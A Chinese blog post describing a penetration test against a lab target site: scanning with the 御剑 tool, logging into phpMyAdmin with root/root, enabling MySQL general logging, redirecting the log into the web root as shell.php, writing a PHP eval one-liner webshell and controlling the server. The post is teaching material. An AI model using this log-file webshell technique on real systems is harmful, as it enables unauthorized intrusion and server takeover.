靶站渗透测试

本文讲述了如何通过御剑工具对目标Web站点进行扫描,发现phpmyadmin漏洞后,利用root权限获取日志文件,植入php一句话木马,并最终在服务器上创建并控制webshell的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web站点渗透

合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。

这里选择的是御剑,用来分析目标地址有哪些网站。

其中发现了phpmyadmin网页地址,打开以后。

通过使用账号root,密码root成功进入后台

以root权限登录网站数据库后,尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。

如日志功能暂未开启。可以执行“set global general_log = "ON";”开启 mysql 日志功能,再次确认日志功能是否开启。

之后执行 sql 语句“select <?php @eval($_POST[1]);?>’”,向日志文件中写入 php 一句话木马。

但由于在linuxmysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件。

修改日志文件存储路径和文件名的语句为“set global general_log_file=' 绝对路径';”。

寻找网站在服务器上的绝对地址(浏览可能包含该信息的文件)。

通过上面的御剑扫描结果可以发现,有一个网址比较可疑,info.php

执行:“set global general_log_file=' C://xxx//xxx//xxx//shell.php';”将日志文件的存储路径改为站点根目录下的 shell.php 文件。

重新写入php一句话木马。

之后在浏览器中访问shell.php,查看是否能够访问成功。

使用webshell管理工具连接创建的shell.php文件,控制服务器。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值